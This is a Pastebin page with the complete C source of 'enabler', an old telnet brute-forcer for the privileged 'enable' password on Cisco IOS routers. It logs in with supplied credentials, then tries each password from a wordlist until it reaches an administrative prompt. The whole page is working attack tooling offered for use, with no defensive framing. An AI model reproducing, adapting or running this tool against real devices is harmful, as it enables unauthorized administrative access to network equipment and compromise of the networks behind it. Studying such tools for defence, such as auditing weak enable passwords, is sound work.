Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- enabler.
- Cisco IOS privileged EXEC bruteforcer
- Year: 2001
- Included in Linux Backtrack v2
- */
- #include <stdio.h>
- #include <stdlib.h>
- #include <errno.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- #include <signal.h>
- #include <string.h>
- #define BOX "\033[0m\033[34;1m[\033[0m\033[37;1m`\033[0m\033[34;1m]"
- struct sockaddr_in addr;
- char host[100];
- struct hostent *hp;
- int sock_stat;
- int n,x;
- char **password;
- char resolve(char *inputhost) {
- int a,b,c,d;
- if (sscanf(inputhost,"%d.%d.%d.%d",&a,&b,&c,&d) !=4) {
- hp = gethostbyname(inputhost);
- if (hp == NULL) { printf("%s error on host resolving\n\033[0m\n", BOX); exit(0); }
- sprintf(host,"%d.%d.%d.%d",(unsigned char)hp->h_addr_list[0][0],
- (unsigned char)hp->h_addr_list[0][1],
- (unsigned char)hp->h_addr_list[0][2],
- (unsigned char)hp->h_addr_list[0][3]);
- }
- else { strncpy(host,inputhost,100); }
- }
- int sock(char *hostoresolve,int port) {
- int err;
- sock_stat = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
- if(sock_stat<0) { printf("%s error opening socket\n\033[0m\n", BOX); exit(0); }
- addr.sin_family = PF_INET;
- addr.sin_port = htons(port);
- addr.sin_addr.s_addr = inet_addr(host);
- err = connect(sock_stat, (struct sockaddr *) &addr, sizeof(addr));
- if (err < 0) { printf("%s error opening connection\n\033[0m\n", BOX); exit(0); }
- }
- int banner() {
- printf("\n%s enabler.\n", BOX);
- printf("%s cisco internal bruteforcer. concept by anyone\n", BOX);
- printf("%s coded by norby\n", BOX);
- }
- int usage(char *argv) { printf("%s usage: %s <ip> [-u user] <pass> <passlist> [port]\n\n\033[0m", BOX, argv); }
- void sig() {
- if(n>0) { printf("%s %i passwords tryed. no password matching. leaving\n",BOX,n); }
- printf("\n\033[0m"); exit(0);
- }
- int login(char *login, char *pass) {
- char *input = malloc(4000);
- int reqlogin;
- while (read (sock_stat, input, 4000) > 0) {
- if(strstr(input,"ogin:")||strstr(input,"sername:")) {
- if(!strcmp(login,"n0login")) {
- printf("%s username needed... give me a username next time :)\n\n\033[0m", BOX);
- exit(0);
- }
- printf("%s login requested. sending [%s] and [%s]\n", BOX, login, pass); reqlogin=1; break;
- }
- if(strstr(input,"assword:")) { printf("%s only password needed. sending [%s]\n", BOX, pass); reqlogin=0; break; }
- bzero(input,4000);
- }
- if(reqlogin==1) {
- write(sock_stat,login,strlen(login));
- write(sock_stat,"\r\n",2);
- while(read(sock_stat,input,4000)>0) {
- if(strstr(input,"assword")); { break; }
- }
- }
- write(sock_stat,pass,strlen(pass));
- write(sock_stat,"\r\n",2);
- sleep(2);
- bzero(input,4000);
- while (read (sock_stat, input, 4000) > 0) {
- if(strstr(input,">")) { printf("%s seems we are logged in :)\n", BOX); break; }
- /* if(strstr(input,"assword:")) {
- printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0);
- }*/
- if(strstr(input,"sername:")) {
- printf("%s sorry... [%s] is not a good password for login :�\n\033[0m\n",BOX,pass); exit(0);
- }
- bzero(input,4000);
- }
- }
- int loadwordlist(char *list) {
- FILE *passlist;
- char buf[32], fake;
- int i,z;
- if ((passlist = fopen(list, "r")) == NULL) {
- printf("%s sorry, unable to open the passlist [%s]\n\033[0m\n", BOX,list);
- exit(0);
- }
- (void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
- password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
- if(password == NULL) {
- printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
- exit(0);
- }
- (void)fseek(passlist, 0L, SEEK_SET);
- while (!feof(passlist)) {
- fgets(buf, 32, passlist);
- if (buf[0] == '#' || buf[0] == '\n') continue;
- for (i = 0; i < strlen(buf); i++)
- if (buf[i] == '\n'||buf[i] == '\r') buf[i] = '\0';
- password[x] = malloc(32);
- strcpy(password[x], buf);
- memset(buf, 0, 32);
- x++;
- }
- password[x] = 0x0;
- fclose(passlist);
- if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }
- }
- int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)
- char *input = malloc(100);
- int N;
- bzero(input,100);
- write(sock_stat,"enable",6);
- write(sock_stat,"\r\n",2);
- while(1) {
- while(read(sock_stat,input,100)>0) {
- if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
- if(n+1==x) break;
- if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
- bzero(input,100);
- }
- if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }
- if(strstr(input,"assword:")) {
- write(sock_stat,password[n],strlen(password[n]));
- write(sock_stat,"\r\n",2);
- n++;
- bzero(input,100);
- if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
- continue;
- }
- if(strstr(input,">")) {
- write(sock_stat,"enable\r\n",8); bzero(input,100);
- }
- }
- }
- int main(int argc, char *argv[]) {
- int port;
- signal(SIGINT, sig);
- banner();
- if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }
- if(!strcmp(argv[2],"-u")) {
- if(argc==6) { port=atoi("23"); }
- else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
- // c'ho cosetta nella testa :� -- Corretto :)
- printf("%s\n",BOX);
- loadwordlist(argv[5]);
- resolve(argv[1]);
- sock(host, port);
- login(argv[3],argv[4]);
- brute();
- }
- else {
- if(argc==4) { port=atoi("23"); }
- else { port=atoi(argv[4]); }
- printf("%s\n",BOX);
- loadwordlist(argv[3]);
- resolve(argv[1]);
- sock(host, port);
- login("n0login",argv[2]);
- brute();
- }
- }
Add Comment
Please, Sign In to add comment